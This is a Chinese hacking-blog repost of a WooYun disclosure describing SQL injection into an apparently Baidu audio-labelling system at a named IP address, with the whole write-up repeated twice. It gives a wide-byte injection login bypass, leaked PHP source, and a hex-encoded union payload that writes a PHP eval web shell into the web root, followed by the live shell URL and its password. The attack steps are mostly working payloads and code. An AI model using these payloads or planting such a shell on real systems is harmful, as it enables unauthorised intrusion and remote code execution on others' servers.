记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

百度某系统SQL注入到Getshell

2016-01-15 00:30

http://115.239.210.62:8080 百度一个关于音频的系统



页面gbk猜测存在宽字节注入



1.png





%df' or 1# bypass登录



2.png







3.png





进入后台就想shell一波 但是完全没有上传的地方

刚好页面有些有warnming 报出路径 还想利用之前方法写波shell



4.png





但是写shell的into outfile '路径' 单引号被转义了 是不行的



后台存在很多注入 尝试读文件试试



6.png





是可以读文件的 那么下面的思路就是审计源码 寻找shell方法



code 区域
/home/audio/label/apache/htdocs/new_user_post.php

/home/audio/label/apache/htdocs/new_user.php

/home/audio/label/apache/htdocs/label/index.php

/home/audio/label/apache/htdocs/register.php

/home/audio/label/apache/htdocs/user_management.php

/home/audio/label/apache/htdocs/user_modify.php

/home/audio/label/apache/htdocs/user_work.php

/home/audio/label/apache/htdocs/user_work_show.php

/home/audio/label/apache/htdocs/session_destroy.php

/home/audio/label/apache/htdocs/user_delete.php

/home/audio/label/apache/htdocs/member_login.php

/home/audio/label/apache/htdocs/inc.php

/home/audio/label/apache/htdocs/user_modify_post.php





对上面文件进行读取 简单的增删改查 没有其他多余的操作



注入却无法引入单引号 根据经验 二次注入是可以引入'

接下来寻找二次注入 且注入位置位于 select操作 才可尝试写文件



突破点在下面文件

code 区域
/home/audio/label/apache/htdocs/user_work.php

/home/audio/label/apache/htdocs/user_work_show.php





code 区域
<?php

require('inc.php');

if (isset($_SESSION['wav']) && is_file($_SESSION['wav']) && !unlink($_SESSION['wav']))

{

echo "Warning:deleting".$_SESSION['wav']."failed";

}

if (isset($_SESSION['pic']) && is_file($_SESSION['pic']) && !unlink($_SESSION['pic']))

{

echo "Warning:deleting".$_SESSION['pic']."failed";

}

if (isset($_SESSION['adpcm']) && is_file($_SESSION['adpcm']) && !unlink($_SESSION['adpcm']))

{

echo "Warning:deleting".$_SESSION['adpcm']."failed";

}

if(isset($_GET['jump']))

{

if($_GET['jump']==1)

{

unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['table'],$_SESSION['effect'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu']);

}

else if($_GET['jump']==2)

{

unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['effect'],$_SESSION['table'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu'],$_SESSION['fcon'],$_SESSION['su']);

}

}

if(empty($_SESSION['pass']) || $_SESSION['pass']!="ok")

{

echo "请您重新<a href='index.php'>登录</a></br>";

header("refresh:2; URL='index.php'");

exit;

}

$link = getAN_DBLink();

if($_SESSION['auth']==2)

{

$sql="select id,Name,authority,real_name from annotator where id=".$_SESSION['id']."";

}

else if($_SESSION['auth']==1)

{

$sql="select id,Name,authority,real_name from annotator where authority>".$_SESSION['auth']." or id=".$_SESSION['id']."";

}

else if($_SESSION['auth']==0)

{

$sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";

}

else

{

echo "权限分配有误,请重新<a href='index.php'>登录</a></br>";

header("refresh:2; URL='index.php'");

exit;

}

$con="[query:".date('c')."]查询数据:".$sql.":user_work.php:line 61\r\n";

write_log($con);

$result=mysql_query($sql) or die("数据库查询失败");

$num=mysql_num_rows($result);

if($_SESSION['work']=="annotate")

$chn_type="标注";

else if($_SESSION['work']=="check")

$chn_type="检查";

else

$chn_type="精选";

?>





code 区域
else if($_SESSION['auth']==0)

{

$sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";

}



$_SESSION['auth'] 是我找到唯一在select中且有可能控制的参数

$_SESSION 是在登录赋值的 那么去看下登录文件



code 区域
/home/audio/label/apache/htdocs/member_login.php





code 区域
<?php

require_once ('inc.php');

if(empty($_POST['name'])){

echo "用户名不能为空,自动返回登录界面...</br></br>";

echo "点击返回<a href='index.php'>登录界面</a>";

header("refresh:2; URL='index.php'");

//echo "用户名不能为空,自动返回登录界面...</br></br>";

//echo "点击返回<a href='index.php'>登录界面</a>";

// header('Location:http://10.210.26.11:8080/index.php');

exit;

}

else if(empty($_POST['password'])){

echo "密码不能为空,自动返回登录界面...</br></br>";

echo "点击返回<a href='index.php'>登录界面</a>";

header("refresh:2; URL='index.php'");

exit;

}



else if(empty($_POST['yzm'])){

echo "验证码不能为空,自动返回登录界面...</br></br>";

echo "点击返回<a href='index.php'>登录界面</a>";

header("refresh:2; URL='index.php'");

exit;

}

$link = getAN_DBLink();

$name = mysql_real_escape_string($_POST['name'], $link);

$pw = mysql_real_escape_string($_POST['password'], $link);

$code =$_POST['yzm'];

if( $code != $_SESSION["Checknum"])

{

echo "验证码错误,自动返回登录界面...</br></br>";

echo "点击返回<a href='index.php'>登录界面</a>";

mysql_close();

header("refresh:2; URL='index.php'");

exit;

}

$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'";

$con="[query:".date('c')."]数据库查询:".$sql.":member_login.php:line 43\r\n";

write_log($con);

$result=mysql_query($sql, $link) or die("数据库查询失败");

$num=mysql_num_rows($result);

if($num==0)

{

echo "账户不存在,自动返回登录界面...</br></br>";

echo "点击返回<a href='index.php'>登录界面</a>";

mysql_close();

header("refresh:2; URL='index.php'");

exit;

}

$rs=mysql_fetch_object($result);

//while($rs=mysql_fetch_object($result))

if ($rs != false)

{

$_SESSION['pass'] ="ok";

$_SESSION['num'] =0;

$_SESSION['name'] =$name;

$_SESSION['id'] =$rs->id;

$_SESSION['auth'] =$rs->authority;

$_SESSION['rname'] =$rs->real_name;

$_SESSION['gender'] =$rs->Gender;

$_SESSION['mobile'] =$rs->Mobile;

$_SESSION['ikey'] =$rs->Ikey;

$_SESSION['mail'] =$rs->Mail;

$_SESSION['type'] =$_POST['type'];

$time =date('U');

$ip ="";

if(isset($_SERVER['HTTP_CLIENT_IP']))

{

$ip=$_SERVER['HTTP_CLIENT_IP'];

}

else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))

{

$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];

}

else{

$ip=$_SERVER['REMOTE_ADDR'];

}





code 区域
$_SESSION['auth']     =$rs->authority;





$rs又是根据

code 区域
$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'"



查询出来的



那么登录的时候利用联合查询直接控制authority 即可



name只需传入下面代码即可

code 区域
test%df' union select 1,0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027,3,4,5,6,7,8,9#





code 区域
0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027

0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'





通过联合查询 不仅bypass进入系统 而且在第二个字段控制为 0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'



进入之后访问 user_work.php 文件即可



最后生成shell http://115.239.210.62:8080/label/test.php 密码:s



QQ图片20151130132632.png





内网 未深入

漏洞证明:

http://115.239.210.62:8080 百度一个关于音频的系统



页面gbk猜测存在宽字节注入



1.png





%df' or 1# bypass登录



2.png







3.png





进入后台就想shell一波 但是完全没有上传的地方

刚好页面有些有warnming 报出路径 还想利用之前方法写波shell



4.png





但是写shell的into outfile '路径' 单引号被转义了 是不行的



后台存在很多注入 尝试读文件试试



6.png





是可以读文件的 那么下面的思路就是审计源码 寻找shell方法



code 区域
/home/audio/label/apache/htdocs/new_user_post.php

/home/audio/label/apache/htdocs/new_user.php

/home/audio/label/apache/htdocs/label/index.php

/home/audio/label/apache/htdocs/register.php

/home/audio/label/apache/htdocs/user_management.php

/home/audio/label/apache/htdocs/user_modify.php

/home/audio/label/apache/htdocs/user_work.php

/home/audio/label/apache/htdocs/user_work_show.php

/home/audio/label/apache/htdocs/session_destroy.php

/home/audio/label/apache/htdocs/user_delete.php

/home/audio/label/apache/htdocs/member_login.php

/home/audio/label/apache/htdocs/inc.php

/home/audio/label/apache/htdocs/user_modify_post.php





对上面文件进行读取 简单的增删改查 没有其他多余的操作



注入却无法引入单引号 根据经验 二次注入是可以引入'

接下来寻找二次注入 且注入位置位于 select操作 才可尝试写文件



突破点在下面文件

code 区域
/home/audio/label/apache/htdocs/user_work.php

/home/audio/label/apache/htdocs/user_work_show.php





code 区域
<?php

require('inc.php');

if (isset($_SESSION['wav']) && is_file($_SESSION['wav']) && !unlink($_SESSION['wav']))

{

echo "Warning:deleting".$_SESSION['wav']."failed";

}

if (isset($_SESSION['pic']) && is_file($_SESSION['pic']) && !unlink($_SESSION['pic']))

{

echo "Warning:deleting".$_SESSION['pic']."failed";

}

if (isset($_SESSION['adpcm']) && is_file($_SESSION['adpcm']) && !unlink($_SESSION['adpcm']))

{

echo "Warning:deleting".$_SESSION['adpcm']."failed";

}

if(isset($_GET['jump']))

{

if($_GET['jump']==1)

{

unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['table'],$_SESSION['effect'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu']);

}

else if($_GET['jump']==2)

{

unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['effect'],$_SESSION['table'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu'],$_SESSION['fcon'],$_SESSION['su']);

}

}

if(empty($_SESSION['pass']) || $_SESSION['pass']!="ok")

{

echo "请您重新<a href='index.php'>登录</a></br>";

header("refresh:2; URL='index.php'");

exit;

}

$link = getAN_DBLink();

if($_SESSION['auth']==2)

{

$sql="select id,Name,authority,real_name from annotator where id=".$_SESSION['id']."";

}

else if($_SESSION['auth']==1)

{

$sql="select id,Name,authority,real_name from annotator where authority>".$_SESSION['auth']." or id=".$_SESSION['id']."";

}

else if($_SESSION['auth']==0)

{

$sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";

}

else

{

echo "权限分配有误,请重新<a href='index.php'>登录</a></br>";

header("refresh:2; URL='index.php'");

exit;

}

$con="[query:".date('c')."]查询数据:".$sql.":user_work.php:line 61\r\n";

write_log($con);

$result=mysql_query($sql) or die("数据库查询失败");

$num=mysql_num_rows($result);

if($_SESSION['work']=="annotate")

$chn_type="标注";

else if($_SESSION['work']=="check")

$chn_type="检查";

else

$chn_type="精选";

?>





code 区域
else if($_SESSION['auth']==0)

{

$sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";

}



$_SESSION['auth'] 是我找到唯一在select中且有可能控制的参数

$_SESSION 是在登录赋值的 那么去看下登录文件



code 区域
/home/audio/label/apache/htdocs/member_login.php





code 区域
<?php

require_once ('inc.php');

if(empty($_POST['name'])){

echo "用户名不能为空,自动返回登录界面...</br></br>";

echo "点击返回<a href='index.php'>登录界面</a>";

header("refresh:2; URL='index.php'");

//echo "用户名不能为空,自动返回登录界面...</br></br>";

//echo "点击返回<a href='index.php'>登录界面</a>";

// header('Location:http://10.210.26.11:8080/index.php');

exit;

}

else if(empty($_POST['password'])){

echo "密码不能为空,自动返回登录界面...</br></br>";

echo "点击返回<a href='index.php'>登录界面</a>";

header("refresh:2; URL='index.php'");

exit;

}



else if(empty($_POST['yzm'])){

echo "验证码不能为空,自动返回登录界面...</br></br>";

echo "点击返回<a href='index.php'>登录界面</a>";

header("refresh:2; URL='index.php'");

exit;

}

$link = getAN_DBLink();

$name = mysql_real_escape_string($_POST['name'], $link);

$pw = mysql_real_escape_string($_POST['password'], $link);

$code =$_POST['yzm'];

if( $code != $_SESSION["Checknum"])

{

echo "验证码错误,自动返回登录界面...</br></br>";

echo "点击返回<a href='index.php'>登录界面</a>";

mysql_close();

header("refresh:2; URL='index.php'");

exit;

}

$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'";

$con="[query:".date('c')."]数据库查询:".$sql.":member_login.php:line 43\r\n";

write_log($con);

$result=mysql_query($sql, $link) or die("数据库查询失败");

$num=mysql_num_rows($result);

if($num==0)

{

echo "账户不存在,自动返回登录界面...</br></br>";

echo "点击返回<a href='index.php'>登录界面</a>";

mysql_close();

header("refresh:2; URL='index.php'");

exit;

}

$rs=mysql_fetch_object($result);

//while($rs=mysql_fetch_object($result))

if ($rs != false)

{

$_SESSION['pass'] ="ok";

$_SESSION['num'] =0;

$_SESSION['name'] =$name;

$_SESSION['id'] =$rs->id;

$_SESSION['auth'] =$rs->authority;

$_SESSION['rname'] =$rs->real_name;

$_SESSION['gender'] =$rs->Gender;

$_SESSION['mobile'] =$rs->Mobile;

$_SESSION['ikey'] =$rs->Ikey;

$_SESSION['mail'] =$rs->Mail;

$_SESSION['type'] =$_POST['type'];

$time =date('U');

$ip ="";

if(isset($_SERVER['HTTP_CLIENT_IP']))

{

$ip=$_SERVER['HTTP_CLIENT_IP'];

}

else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))

{

$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];

}

else{

$ip=$_SERVER['REMOTE_ADDR'];

}





code 区域
$_SESSION['auth']     =$rs->authority;





$rs又是根据

code 区域
$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'"



查询出来的



那么登录的时候利用联合查询直接控制authority 即可



name只需传入下面代码即可

code 区域
test%df' union select 1,0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027,3,4,5,6,7,8,9#





code 区域
0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027

0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'





通过联合查询 不仅bypass进入系统 而且在第二个字段控制为 0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'



进入之后访问 user_work.php 文件即可



最后生成shell http://115.239.210.62:8080/label/test.php 密码:s



QQ图片20151130132632.png





内网 未深入

修复方案:

登录之后全是注入哎。

知识来源: www.wooyun.org/bugs/wooyun-2016-0157024

阅读:106287 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“百度某系统SQL注入到Getshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云